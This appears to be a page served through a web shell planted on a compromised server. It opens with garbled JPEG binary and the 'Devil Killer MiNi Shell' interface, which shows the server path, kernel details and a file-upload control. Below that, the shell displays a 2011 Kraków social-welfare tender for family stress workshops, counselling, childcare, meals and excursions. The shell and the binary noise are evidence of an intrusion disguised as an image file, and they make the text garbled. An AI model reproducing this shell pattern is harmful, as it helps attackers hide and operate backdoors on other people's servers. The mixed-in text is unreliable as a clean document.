JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111025/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111025/351568-N-2011.html

<p class="kh_header"><b>Kraków: zorganizowanie warsztatów dla uczestników Programu Aktywności Lokalnej w ramach projektu Pora na aktywność</b><br>
<b>Numer ogłoszenia: 351568 - 2011; data zamieszczenia: 25.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zorganizowanie warsztatów dla uczestników Programu Aktywności Lokalnej w ramach projektu Pora na aktywność.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  I części zamówienia jest zorganizowanie i przeprowadzenie warsztatów dla uczestników Programu Aktywności Lokalnej dla Dzielnic V i VII Siła Rodziny w ramach projektu  Pora na aktywność umożliwiających podniesienie kompetencji społecznych młodzieży w wieku 15-24 i ich rodzin, zgodnie z poniższymi wytycznymi:
 1)Ilość uczestników: ogółem 64 osoby w tym:
             a)  29 osób od 15-24 lat ( młodzież)
       b)  13 osób dorosłych ( rodzice)
       c)  18 dzieci 
       d)  4 osoby ze strony Zamawiającego (psycholog, pedagog , animator lokalny, pracownik      socjalny)
2)Sposób organizacji zajęć:
   a)Warsztaty prowadzone będą oddzielnie dla  3 grup uczestników (maksymalnie 15 osób w grupie):
-  1 grupa dla rodziców 
        - 2 grupy dla młodzieży  
 b) W trakcie zajęć wykonawca umożliwi przeprowadzenie konsultacji indywidualnych z psychologiem   -  zgodnie z potrzebami uczestników warsztatów, maksymalnie 28 godzin,
c) W trakcie zajęć wykonawca umożliwi przeprowadzenie konsultacji indywidualnych z pedagogiem - zgodnie z potrzebami uczestników warsztatu maksymalnie 7 godzin,  
d) Zajęcia będą prowadzone w formie wykładów oraz metodami aktywnymi: dyskusja, wchodzenie w role, praca w grupie.

 
3) Wykonawca przeprowadzi warsztaty według poniższej specyfikacji:

Nazwa usługi	Forma	Odbiorca	Łączna ilość godzin
Trening kompetencji społecznych - warsztaty antystresowe - 3 psychologów ze strony Wykonawcy	Zajęcia grupowe	1 grupa rodziców,
2 grupy młodzieży 	8,5 na grupę
Poradnictwo specjalistyczne psychologiczne - 3 psychologów ze strony Wykonawcy, 1 psycholog ze strony Zamawiającego	Zajęcia indywidualne	W zależności od potrzeb	Maksymalnie 28 godzin. W zależności od potrzeb uczestników w ramach limitu
Trening kompetencji społecznych - nauka i trening zachowań w miejscach publicznych - 3 psychologów i 1 pedagog ze stromy Wykonawcy 	Zajęcia grupowe	Wszyscy uczestnicy	8 godzin zajęć (w tym 3 godziny warsztatów w trakcie których będzie zorganizowany grill oraz 5 godzin zajęć w terenie ( Wycieczka poza teren ośrodka  w 3 dniu warsztatów)
Poradnictwo specjalistyczne pedagogiczne- 1 pedagog ze strony Zamawiającego
	Zajęcia indywidualne	W zależności od potrzeb	Maksymalnie 7 godzin. W zależności od potrzeb uczestników w ramach limitu
Opieka nad dziećmi- 1 pedagog ze strony Wykonawcy, 1 pedagog ze strony Zamawiającego	Zajęcia grupowe	2 grupy dzieci do 14 roku życia	14,5 godzin na grupę- łącznie 29 godzin


4) Wymogi dotyczące realizacji miejsca zamówienia:
      pensjonatośrodek wypoczynkowy, ośrodek szkoleniowy w    odległości do 150 km od Krakowa ( poza terenem powiatu krakowskiego) w pobliżu którego ( maksymalnie do 30 km)  znajduje się atrakcja turystyczna, dysponujący:
   a) 3 salami  do zajęć  grupowych , każda na minimum 15 osób , układ sali     umożliwiający        
przeprowadzenie warsztatów tj. ułożenie krzeseł w półkoleokrąg, przestrzeń na ćwiczenia    
ruchowe. Wyposażenie każdej z sal: tablica typu flipczart z markerami( 4x czarny, 2x niebieski, 2x zielony, 2x czerwony)
 b) 1 salą  do zajęć dla dzieci wraz z wyposażeniem w zabawki, gry planszowe i materiały plastyczne, zestaw do oglądania filmów, miejscem do odpoczynku,
 c)własną kuchnią i stołówką , miejscem do grillowania z miejscami do siedzenia
dla każdego uczestnika
 d) pokojami  1,2,3,4 osobowymi z  łazienką , jednoosobowymi łóżkami, do każdego łóżka przynależna szafka lub minimum 1 półka w szafie
 e) 5 pokojami do zajęć indywidualnych
 f) w budynku zakwaterowania, bądź nie dalej niż 200 m od niego winien się mieścić basen, z którego uczestnicy będą mogli korzystać bez ponoszenia dodatkowych opłat w wymiarze 1 godziny na osobę w trakcie pobytu.

5) Wymagania dotyczące realizacji usługi: warsztaty radzenia sobie ze stresem - zajęcia     
     grupowe dla młodzieży (zajęcia prowadzone równolegle do zajęć dla rodziców) - 2 grupy 
     młodzieży  po 1 osobie prowadzącej na grupę:
a) Liczba godzin przypadająca na jednego uczestnika - 6 godzin,
b) Program treningu będzie ukierunkowany na realizację następujących celów:
	naukę rozpoznawania źródeł stresu
	naukę technik zmniejszania negatywnych skutków stresu 
	nauka technik efektywnego zarządzania własną energią
	kształtowanie odporności na stres
c) Zakres tematyczny warsztatów:
	 stres - prawdy i mity, stres pozytywny i negatywny
	rozpoznawanie źródeł stresu w rodzinie i szerszym środowisku
	następstwa stresu w rodzinie
	profilaktyka  i zmniejszanie negatywnych skutków stresu - kształtowanie odporności na stres.
	mądre zarządzanie własną energią
	poznawanie i rozwijanie własnych umiejętności emocjonalnych
d)Warsztat obejmuje:
	ćwiczenia interpersonalne
	praktyczną naukę technik zmniejszania negatywnych skutków stresu
	techniki relaksacyjne
	techniki oddechowe

6) Wymagania dotyczące realizacji usługi - warsztaty radzenia sobie ze stresem - zajęcia   
     grupowe dla rodziców (zajęcia prowadzone równolegle do zajęć dla młodzieży) - 1 
     osoba prowadząca:
a) Liczba godzin przypadająca na jednego uczestnika - 6 godzin
b) Program treningu będzie ukierunkowany na realizację następujących celów:
	naukę rozpoznawania źródeł stresu
	naukę technik zmniejszania negatywnych skutków stresu 
	nauka technik efektywnego zarządzania własną energią
	kształtowanie odporności na stres
c)Zakres tematyczny warsztatów:
	stres - prawdy i mity, stres pozytywny i negatywny
	rozpoznawanie źródeł stresu w rodzinie i szerszym środowisku
	następstwa stresu w rodzinie
	profilaktyka  i zmniejszanie negatywnych skutków stresu - kształtowanie odporności na stres
	mądre zarządzanie własną energią
	poznawanie i rozwijanie własnych umiejętności emocjonalnych
d)Warsztat obejmuje:
ćwiczenia interpersonalne
	praktyczną naukę technik zmniejszania negatywnych skutków stresu
	techniki relaksacyjne
	techniki oddechowe

7) Wymagania dotyczące realizacji usługi - Opieka nad dziećmi beneficjentów - 1 osoba:
a) opieka nad dziećmi ma się odbywać podczas uczestniczenia rodziców w zajęciach grupowych oraz podczas ich zajęć indywidualnych 
b) harmonogram opieki nad dziećmi winien być równoległy do harmonogramu zajęć rodziców
c) zajęcia winny być dostosowane do wieku i możliwości dzieci oraz warunków pogodowych
f) program zajęć dla dzieci: gry i zabawy sportowe, zajęcia plastyczne, projekcja filmów
g)Organizator zobowiązany jest do zabezpieczenia dla dzieci materiałów plastycznych, dydaktycznych, gier, ,sprzętu sportowego, wejściówek na zajęcia zorganizowane.

8). Wymagania dotyczące realizacji usługi  - 1 wyjście w celu podniesienia kompetencji   
      społecznych:
a) wyjście (5-godzinne) -  w celu podniesienia kompetencji społecznych - nauka i trening zachowań w miejscach publicznych jako forma kształtowania kompetencji społecznych i korzystania z oferty kulturalnej -zajęcia grupowe dla całych rodzin  - w wymiarze  5 godzin na osobę
b) wycieczka turystyczno-krajoznawcza aktywne zwiedzanie -gra terenowa dla całych rodzin zwiedzanie zabytków; z wersją alternatywną w przypadku niesprzyjających warunków pogodowych (zwiedzanie obiektów zamkniętych)
c) nagroda dla zwycięzców gry - ilustrowany przewodnik turystyczny dotyczący zwiedzanego regionu

   9) Harmonogram pobytu:


Godzina 	Zajęcia
	Młodzież	Rodzice	Dzieci
Dzień 1
10:00	Zbiórka uczestników przy ul. Ingardena - wyjazd z Krakowa
13:00 - 15:30	Przyjazd na miejsce, zakwaterowanie w pokojach, obiad
16:00 - 18:30	Zajęcia integracyjne  poznanie uczestników (prowadzący: psycholog)
	Zajęcia integracyjne - poznanie uczestników (prowadzący: psycholog)
	Opieka nad dziećmi uczestników

18:30 - 21:30	Kolacja - Kontynuacja spotkania integracyjnego przy grillu
19:30-21:30	Poradnictwo indywidualne dla 10 osób (8 osób-psycholog; 2 osoby-pedagog)
	Opieka nad dziećmi z rodzin korzystających z poradnictwa
22:00 - 6:00	Cisza nocna
Dzień 2
8:00 - 9:00	Śniadanie - 
10:00 - 12:00	 warsztaty radzenia sobie ze stresem	 Warsztaty radzenia sobie ze stresem	Opieka nad dziećmi uczestników
12:15 - 13:15	Poradnictwo indywidualne dla 5 osób (4 osoby-psycholog; 1 osoba-pedagog)	Opieka nad dziećmi uczestników
13:30 - 14:30	Obiad
15:00 - 17:00	 warsztaty radzenia sobie ze stresem	 Warsztaty radzenia sobie ze stresem	Opieka nad dziećmi uczestników
17:00 - 18:00	Basen Poradnictwo indywidualne dla 5 osób (4 osoby-psycholog, 1 osoba-pedagog)	Opieka nad dziećmi osób korzystających z poradnictwa
18:30 - 19:30	Kolacja  
20:00 - 22:00	Poradnictwo indywidualne dla 10 osób (8 osób-psycholog; 2 osoby-pedagog)	Opieka nad dziećmi osób korzystających z poradnictwa
22:00 - 6:00	Cisza nocna
Dzień 3
8:00 - 9:00	Śniadanie 
10:00 - 12:00	 warsztaty radzenia sobie ze stresem	 Warsztaty radzenia sobie ze stresem	Opieka nad dziećmi uczestników
12:30 - 17:30	Wyjście (wycieczka) w celu podniesienia kompetencji społecznych dla całych rodzin:
- miejska gra terenowa
- obiad
17:30	Zbiórka uczestników - wyjazd do Krakowa
19:00	Przyjazd do Krakowa


10) Wymogi dotyczące realizacji miejsca zamówienia:
      pensjonat/ośrodek wypoczynkowy, ośrodek szkoleniowy w    odległości do 150 km od Krakowa ( poza terenem powiatu krakowskiego) w pobliżu którego ( maksymalnie do 30 km)  znajduje się atrakcja turystyczna, dysponujący:
   a) 3 salami  do zajęć  grupowych , każda na minimum 15 osób , układ sali     umożliwiający        
przeprowadzenie warsztatów tj. ułożenie krzeseł w półkole/okrąg, przestrzeń na ćwiczenia    
ruchowe. Wyposażenie każdej z sal: tablica typu flipczart z markerami( 4x czarny, 2x niebieski, 2x zielony, 2x czerwony)
 b) 1 salą  do zajęć dla dzieci wraz z wyposażeniem w zabawki, gry planszowe i materiały plastyczne, zestaw do oglądania filmów, miejscem do odpoczynku
 c)własną kuchnią i stołówką , miejscem do grillowania z miejscami do siedzenia
dla każdego uczestnika
 d) pokojami  1,2,3,4 osobowymi z  łazienką , jednoosobowymi łóżkami, do każdego łóżka przynależna szafka lub minimum 1 półka w szafie
 e) 5 pokojami do zajęć indywidualnych
11. Wykonawca jest zobowiązany zapewnić:
1)	bilety wstępu do zwiedzanych obiektów,
2)   pokrycie kosztów  opłat parkingowych,
3) opłatę klimatyczną,
4)  ubezpieczenie NNW oraz kosztów leczenia na kwotę min.10000zł/os,
   5)   opiekę przewodnika przy zwiedzaniu obiektów,
   6)  dojazd uczestnikom warsztatów z siedziby Zamawiającego do miejsca   szkolenia i z powrotem własnymi lub udostępnionymi przez firmę  Przewozową autokarami, zgodnie z obowiązującymi przepisami dot. przewozu osób. Autokary mają  posiadać klimatyzację lub możliwość otwierania okien   Obowiązkiem przewoźnika jest posiadać wymagane przepisami dokumenty    m.in. licencję przewoźnika oraz zobowiązać się do podstawienia autokaru  sprawnego technicznie, posiadającego pełną dokumentacje gwarantującą  przejazd na trasie  określonej w umowie zgodnie z przepisami obowiązującymi  w Polsce, posiadać   wymagane ubezpieczenie. Kierowca jest zobowiązany do   dbania o czystość   autokaru podczas podróży, 
  7)   właściwą jakość przygotowywanego posiłku z uwzględnieniem temperatury i          innych wymogów ustawy o warunkach zdrowotnych żywności i żywienia oraz             przepisów ustawy o Państwowej Inspekcji Sanitarnej,
    8)  oznaczenia dokumentów wytworzonych w związku z realizacją zadania,             materiałów, pomieszczeń  w których odbywać się będą zajęcia itp., zgodnie z           wytycznymi oznaczania projektów POKL, zamieszczonymi na stronie            internetowej www.efs.gov.pl/ZPFE/Strony/Dokumenty.aspx,
9)  wydanie po zakończeniu realizacji usługi zaświadczeń oznakowanych zgodnie z              ww   wytycznymi,
10)  materiały szkoleniowe dla każdego uczestnika warsztatów: planu zajęć, długopisu          metalowego typu zenit, bloku biurowego 60 stron kratko A4, skryptu zawierającego       tematy omawiane na zajęciach, wskazówki porady, których odbiór poświadczy         uczestnik warsztatów,
11) opiekę pielęgniarską lub opiekę lekarską polegającą na wezwaniu lekarza do ośrodka 
      lub dowiezieniu uczestnika pobytu do przychodni/szpitala . 
12. Podczas realizacji usługi Wykonawca zobowiązany jest do: prowadzenia dziennika każdych zajęć zawierający listę obecności, wymiar godzin i tematy zajęć.
13 Wykonawca przedstawi szczegółowy program zajęć, opieki nad dziećmi oraz konspektów zajęć do akceptacji Zamawiającego terminie do 7 dni po podpisaniu umowy.
14  Wykonawca  zachowa w tajemnicy wszelkie dane osobowe, do których uzyskał dostęp  w  związku z wykonywaniem zadania oraz przestrzegania innych postanowień ustawy   o  ochronie danych osobowych.
15 Wykonawca zobowiązany jest dostarczyć polisę ubezpieczeniową potwierdzającą warunek ubezpieczenia uczestników najpóźniej  na 2 dni przed terminem     wyjazdu.
16. Koszt pobytu pracowników Zamawiającego Wykonawca jest zobowiązany uwzględnić           
      w cenie oferty. 
   17.  Podczas realizacji usługi Wykonawca zobowiązany jest do prowadzenia dokumentacji         
         fotograficznej usługi i  przekazania jej na zakończenie  całej usługi Zamawiającemu.
  18. Wykonawca może zostać skontrolowany w zakresie przedmiotu zamówienia przez         
        Zamawiającego lub podmiot kontrolujący Zamawiającego.
   19. W pomieszczeniach, w których będą odbywać się zajęcia będzie panować temperatura         
        pokojowa.
  20. Pokoje , w których będą zakwaterowani beneficjenci będą dla nich dostępne do momentu             
        wyjazdu z ośrodka.
  19 .Wykonawca zapewni 3 posiłki dziennie ,serwis kawowy w przerwie między zajęciami dla 
        dorosłych,  wyżywienie dla dzieci ( w trakcie zajęć dla dorosłych) oraz suchy  prowiant w 
        trakcie wycieczki  wg specyfikacji:



Dorośli:
serwis kawowy na zajęcia  zgodnie z menu na osobę:
kawa - 250 ml
herbata - 250ml
woda mineralna - butelka 0,5l
soki owocowe100% (jabłkowy, pomarańczowy)w dzbankach 250 ml na osobę
ciasteczka konferencyjne - 150g na osobę

Dzieci:
zgodnie z menu  na dziecko
drożdżówka - 1 szt.
serek homogenizowany 150g
sok owocowy 1005 w zakręcanej butelce 330ml
woda mineralna 500ml
owoc -1 szt. ( jabłko lub banan)


Jadłospis zgodnie z menu na osobę:

1 dzień
Obiad:   
zupa pomidorowa z makaronem / 400 ml/
kotlet schabowy, 150 g
ziemniaki  200 g
sałata ze śmietaną, 150 g
banan, 1 sztuka 
herbata lub sok owocowy  250 ml 

Kolacja z grillem:
mięsa grillowane: karczek wieprzowy- 0,1kg, udko kurczaka- 0,1kg, żeberka- 0,1kg, golonko- 0,1kg
sosy (musztardowy, chrzanowy, ketchup)- 0,05kg/ łącznie
wybór pieczywa (żytnio-pszenne, razowe- łącznie 0,15kg), 

napoje (do wyboru)
kawa150 ml + mleczko do kawy
herbata 200 ml + cytryna
soki owocowe 200 ml.
woda mineralna 200 ml

2 dzień
Śniadanie w formie stołu szwedzkiego:
Mięsa: karkówka, schab, szynka - 0,1kg/ łącznie
2 rodzaje sałatek warzywnych- 0,1kg/ łącznie
Jogurt owocowy- 150ml
Musli zbożowe - 0,05kg
2 rodzaje serów żółtych (ostry, łagodny, wędzony)- 0,05kg/ łącznie
2 rodzaje twarożku na słodko i na ostro- 0,1kg/ łącznie
ogórek, sałata, pomodor- 0,05kg łącznie
wybór pieczywa (żytnio-pszenne, razowe, bułki - łącznie 0,15 kg), 
masło (0,05kg).
Do wyboru: herbata, kawa + mleczko do kawy lub sok owocowy  250 ml 

Obiad:
 	zupa jarzynowa / 400 ml/
 	kotlet rybny  200 g
ziemniaki  200g
surówka z warzyw mieszanych, 150 g
 	jabłko, 1 szt. 
herbata lub sok owocowy  250 ml 

Kolacja w formie szwedzkiego stołu:
Mięsa: karkówka, schab, szynka - 0,1kg/ łącznie
2 rodzaje sałatek warzywnych- 0,1kg/ łącznie
Jajko na twardo - 1 szt. 
2 rodzaje serów żółtych (ostry, łagodny, wędzony)- 0,05kg/ łącznie
ogórek, sałata, pomidor- 0,05kg łącznie
wybór pieczywa (żytnio-pszenne, razowe, bułki - łącznie 0,15 kg), 
masło (0,05kg).
Do wyboru: herbata, kawa + mleczko do kawy lub sok owocowy  250 ml 

3 dzień
Śniadanie w formie szwedzkiego stołu:
Mięsa: karkówka, schab, szynka - 0,1kg/ łącznie
2 rodzaje sałatek warzywnych- 0,1kg/ łącznie
Jogurt owocowy- 150ml
Musli zbożowe - 0,05kg
2 rodzaje serów żółtych (ostry, łagodny, wędzony)- 0,05kg/ łącznie
2 rodzaje twarożku na słodko i na ostro- 0,1kg/ łącznie
ogórek, sałata, pomidor - 0,05kg łącznie
wybór pieczywa (żytnio-pszenne, razowe, bułki - łącznie 0,15 kg), 
masło (0,05kg).
Do wyboru: herbata, kawa + mleczko do kawy lub sok owocowy  250 ml 

Obiad: - w trakcie wycieczki
Barszcz z krokietem - 0,25l., krokiet 1szt./0,1kg
pierś z kurczaka faszerowana pieczarkami i żółtym serem- 0,15 kg
z kulkami ziemniaczanymi -0,2 kg, 
zestawem surówek -0,15 kg
     	herbata lub sok owocowy  250 ml 

Suchy prowiant w trakcie wycieczki
Prowiant na 1 osobę: 
2 szt. soczek w kartonie 200 ml; 
2 bułki z szynką, serem żółtym, sałatą i pomidorem.

2. Przedmiotem II części zamówienia jest zorganizowanie warsztatów o charakterze integracyjnym dla uczestników Programu Aktywności Lokalnej Razem zmieniamy w ramach projektu Pora na aktywność.
1) Ilość osób: 30 uczestników Programu Aktywności Lokalnej w wieku od 18-65 lat oraz 2
   osoby ze strony Zamawiającego (animator lokalny i psycholog)
2) Sposób organizacji , metody i cele warsztatów integracyjnych: 
a)Warsztaty integracyjne (4 godz.) w pierwszym dniu prowadzone będą w 2 grupach (po     15 osób w grupie); jedną grupę poprowadzi psycholog  zapewniony przez Zamawiającego, drugą psycholog zapewniony przez Wykonawcę. W drugi dzień 4 godzinne warsztaty dla grupy 30 osobowej poprowadzi psycholog zapewniony przez Zamawiającego. Rolę kotrenera będzie pełnił psycholog zapewniony przez Wykonawcę. Brak podziału na poszczególne grupy wynika z zaplanowanego celu integracji uczestników zajęć warsztatowych
     b) warsztaty integracyjne będą prowadzone metodami aktywnymi np.: dyskusja,          
         wchodzenie w role,  burza mózgów, rozmowa kierowana, gry i zabawy ruchowe, praca       
         w grupie
   c) Celem zajęć warsztatowych jest wzajemna integracja uczestników wyjazdu, podniesienie   
        kompetencji społecznych uczestników, zwiększą umiejętność pracy w zespole,         
       przyswojenie norm grupowych.
3) Wykonawca organizuje zajęcia (dla jednej grupy 15 osobowej w I dzień) według poniższej specyfikacji:
a)Powitanie grupy
b)Przedstawienie się uczestników
c)Ustalenie kontraktu z grupą na czas trwania zajęć: zasad obowiązujących trwania d)warsztatów (współpraca, aktywność, dyskrecja itp.)
e)Omówienie celów integracji
f)Zabawy i gry obniżające napięcie emocjonalne, aktywizujące metody gier i zabaw  
g)Zadania realizujące główny cel warsztatów: integrację uczestników
h)Omawianie z uczestnikami poszczególnego zadania, uzyskanie informacji zwrotnych,   
   komentarze prowadzącego
i)Podsumowanie
4)Wykonawca w II dzień wyjazdu zorganizuje grupowe wyjście integracyjne do obiektu sportowego typu: basen termalny, kryty, gorące źródła.

5) Harmonogram pobytu:

Godzina 	Zajęcia
Dzień 1
9:00	Zbiórka uczestników pod kościołem na os. Ruszcza - wyjazd z Krakowa
11:30 - 14:00	Przyjazd na miejsce, zakwaterowanie w pokojach, obiad 
15:00 - 19:00	Warsztaty integracyjne  
19:30 - 21:30	Kolacja - kontynuacja spotkania integracyjnego przy grillu (ognisku)
22:00 - 6:00	Cisza nocna
Dzień 2
8:00 - 9:00	Śniadanie
9:30 - 13:30	Warsztaty integracyjne
13:45 - 14:45	Obiad
15:00 - 17:30	Grupowe wyjście integracyjne
18:00	Zbiórka uczestników - wyjazd do Krakowa
20:00	Przyjazd do Krakowa

6) Wymogi dotyczące realizacji miejsca zamówienia:
 a)   pensjonat/ośrodek wypoczynkowy, ośrodek szkoleniowy w    odległości do 130  
        km od Krakowa ( poza terenem powiatu krakowskiego) w pobliżu którego
       ( maksymalnie do 30 km)  znajduje się basen kryty, baseny termalne, gorące źródła        
       dysponujący:
b)    2 salami  do zajęć  grupowych ,dostępnymi w wymiarze po 4 godziny dziennie w  
       trakcie  pobytu , Jedna z nich na minimum 30 osób , układ sali     umożliwiający 
       przeprowadzenie warsztatów tj. ułożenie krzeseł w półkole/okrąg, przestrzeń na 
       ćwiczenia   ruchowe. Wyposażenie każdej z sal: tablica typu flipczart z markerami
       (    4x czarny, 2x niebieski, 2x  zielony, 2x czerwony)
c)   własną    kuchnią  i  stołówką , miejscem  do   grillowania z miejscami  do siedzenia 
      dla   każdego uczestnika
d)   pokojami   1,2,3, osobowymi z  łazienką ,  jednoosobowymi  łóżkami, do  każdego  
    łóżka  przynależna szafka lub minimum 1 półka w szafie.
7) Wykonawca jest zobowiązany zapewnić:
a)	bilety wstępu do obiektów sportowych
b)	pokrycie kosztów  opłat parkingowych
c)	opłatę klimatyczną
d)	ubezpieczenie NNW oraz kosztów leczenia na kwotę min.10000zł/os,
e)	dojazd uczestnikom warsztatów z siedziby Zamawiającego do miejsa szkolenia i z powrotem własnymi lub udostępnionymi przez firmę przewozową autokarami, zgodnie z obowiązującymi przepisami dot. przewozu osób. Autokary mają  posiadać klimatyzację lub możliwość otwierania okien. Obowiązkiem przewoźnika jest posiadać wymagane przepisami dokumenty m.in. licencję przewoźnika oraz zobowiązać się do podstawienia autokaru sprawnego technicznie, posiadającego pełną dokumentacje gwarantującą przejazd na trasie  określonej w umowie zgodnie z przepisami obowiązującymi w Polsce, posiadać   wymagane ubezpieczenie. Kierowca jest zobowiązany do dbania o czystość   autokaru podczas podróży,
f)	 właściwą jakość przygotowywanego posiłku z uwzględnieniem temperatury i innych wymogów ustawy o warunkach zdrowotnych żywności i żywienia oraz  przepisów ustawy o Państwowej Inspekcji Sanitarnej
g)	 oznaczenia dokumentów wytworzonych w związku z realizacją zadania, materiałów, pomieszczeń  w których odbywać się będą zajęcia itp., zgodnie z wytycznymi oznaczania projektów POKL, zamieszczonymi na stronie  internetowej www.efs.gov.pl/ZPFE/Strony/Dokumenty.aspx,
h)	opiekę pielęgniarską lub opiekę lekarską polegającą na wezwaniu lekarza do ośrodka lub dowiezieniu uczestnika pobytu do przychodniszpitala  
8. Podczas realizacji usługi Wykonawca zobowiązany jest do prowadzenia  listy obecności, oraz wymiar godzin  warsztatów ( w pierwszym dniu w grupie 15 osobowej).
9 . Wykonawca  zachowa w tajemnicy wszelkie dane osobowe, do których uzyskał dostęp  w związku z wykonywaniem zadania oraz przestrzegania innych postanowień ustawy  o  ochronie danych osobowych.
